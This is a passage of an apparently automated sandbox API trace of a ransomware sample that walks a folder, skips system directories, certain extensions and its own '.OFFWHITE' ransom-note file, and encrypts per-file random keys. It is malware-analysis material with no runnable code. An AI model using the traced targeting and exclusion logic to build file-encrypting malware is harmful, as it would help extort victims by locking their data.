lpString2=".cmd") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.091] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.091] lstrcmpiW (lpString1="ringtones.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.091] GetProcessHeap () returned 0x500000 [0144.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e890 [0144.091] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.092] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.092] GetProcessHeap () returned 0x500000 [0144.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea90 [0144.092] GetProcessHeap () returned 0x500000 [0144.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eaa8 [0144.092] GetProcessHeap () returned 0x500000 [0144.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55de90 [0144.092] GetProcessHeap () returned 0x500000 [0144.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55df98 [0144.092] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.092] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.092] SystemFunction036 (in: RandomBuffer=0x53ea90, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea90) returned 1 [0144.092] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.092] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.092] SystemFunction036 (in: RandomBuffer=0x53eaa8, RandomBufferLength=0x10 | out: RandomBuffer=0x53eaa8) returned 1 [0144.092] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.092] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.092] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55de90*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55de90*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.093] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.093] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.093] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55df98*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55df98*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.093] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.093] SetLastError (dwErrCode=0x0) [0144.093] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55de90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.093] GetLastError () returned 0x6 [0144.093] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d17f5a, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d17f5a, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2=".") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="..") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="...") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="windows") returned -1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="$recycle.bin") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="rsa") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="ntuser.dat") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="programdata") returned 1 [0144.093] lstrcmpiW (lpString1="settings.ico", lpString2="appdata") returned 1 [0144.094] lstrcmpiW (lpString1="settings.ico", lpString2="program files") returned 1 [0144.094] lstrcmpiW (lpString1="settings.ico", lpString2="program files (x86)") returned 1 [0144.094] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.094] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="settings.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" [0144.094] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.094] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.094] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.094] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.094] lstrcmpiW (lpString1="settings.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.094] GetProcessHeap () returned 0x500000 [0144.094] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8a0 [0144.095] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.095] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.095] GetProcessHeap () returned 0x500000 [0144.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eac0 [0144.095] GetProcessHeap () returned 0x500000 [0144.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ead8 [0144.095] GetProcessHeap () returned 0x500000 [0144.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e0a0 [0144.095] GetProcessHeap () returned 0x500000 [0144.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e1a8 [0144.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.095] SystemFunction036 (in: RandomBuffer=0x53eac0, RandomBufferLength=0x10 | out: RandomBuffer=0x53eac0) returned 1 [0144.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.095] SystemFunction036 (in: RandomBuffer=0x53ead8, RandomBufferLength=0x10 | out: RandomBuffer=0x53ead8) returned 1 [0144.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.095] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e0a0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55e0a0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.096] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.096] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.096] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e1a8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55e1a8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.096] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.096] SetLastError (dwErrCode=0x0) [0144.096] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55e0a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.096] GetLastError () returned 0x6 [0144.096] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d3e0b7, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d3e0b7, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2=".") returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="..") returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="...") returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="windows") returned -1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="$recycle.bin") returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="rsa") returned 1 [0144.096] lstrcmpiW (lpString1="sync.ico", lpString2="ntuser.dat") returned 1 [0144.097] lstrcmpiW (lpString1="sync.ico", lpString2="programdata") returned 1 [0144.097] lstrcmpiW (lpString1="sync.ico", lpString2="appdata") returned 1 [0144.097] lstrcmpiW (lpString1="sync.ico", lpString2="program files") returned 1 [0144.097] lstrcmpiW (lpString1="sync.ico", lpString2="program files (x86)") returned 1 [0144.097] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.097] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="sync.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" [0144.097] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.097] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.097] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.097] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.097] lstrcmpiW (lpString1="sync.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.097] GetProcessHeap () returned 0x500000 [0144.097] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8b0 [0144.098] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.098] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.098] GetProcessHeap () returned 0x500000 [0144.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eaf0 [0144.098] GetProcessHeap () returned 0x500000 [0144.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea30 [0144.098] GetProcessHeap () returned 0x500000 [0144.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e2b0 [0144.098] GetProcessHeap () returned 0x500000 [0144.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e3b8 [0144.098] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.098] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.098] SystemFunction036 (in: RandomBuffer=0x53eaf0, RandomBufferLength=0x10 | out: RandomBuffer=0x53eaf0) returned 1 [0144.098] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.098] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.098] SystemFunction036 (in: RandomBuffer=0x53ea30, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea30) returned 1 [0144.098] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.098] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.098] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e2b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55e2b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.099] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.099] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.099] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e3b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55e3b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.099] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.099] SetLastError (dwErrCode=0x0) [0144.099] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55e2b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.099] GetLastError () returned 0x6 [0144.099] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c219ec7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x7c219ec7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0144.099] lstrcmpiW (lpString1="tasks.xml", lpString2=".") returned 1 [0144.099] lstrcmpiW (lpString1="tasks.xml", lpString2="..") returned 1 [0144.099] lstrcmpiW (lpString1="tasks.xml", lpString2="...") returned 1 [0144.099] lstrcmpiW (lpString1="tasks.xml", lpString2="windows") returned -1 [0144.099] lstrcmpiW (lpString1="tasks.xml", lpString2="$recycle.bin") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="rsa") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="ntuser.dat") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="programdata") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="appdata") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="program files") returned 1 [0144.100] lstrcmpiW (lpString1="tasks.xml", lpString2="program files (x86)") returned 1 [0144.100] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.100] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="tasks.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" [0144.100] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.100] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.100] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.101] lstrcmpiW (lpString1="tasks.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.101] GetProcessHeap () returned 0x500000 [0144.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8c0 [0144.101] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.103] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.103] GetProcessHeap () returned 0x500000 [0144.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb08 [0144.104] GetProcessHeap () returned 0x500000 [0144.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb20 [0144.104] GetProcessHeap () returned 0x500000 [0144.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e4c0 [0144.104] GetProcessHeap () returned 0x500000 [0144.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e5c8 [0144.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.104] SystemFunction036 (in: RandomBuffer=0x53eb08, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb08) returned 1 [0144.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.104] SystemFunction036 (in: RandomBuffer=0x53eb20, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb20) returned 1 [0144.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.104] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e4c0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55e4c0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.105] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e5c8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55e5c8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.105] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.105] SetLastError (dwErrCode=0x0) [0144.105] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55e4c0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.105] GetLastError () returned 0x6 [0144.105] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2=".") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="..") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="...") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="windows") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="$recycle.bin") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="rsa") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="ntuser.dat") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="programdata") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="appdata") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="program files") returned 1 [0144.106] lstrcmpiW (lpString1="wmp.ico", lpString2="program files (x86)") returned 1 [0144.106] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.106] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="wmp.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" [0144.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.106] lstrcmpiW 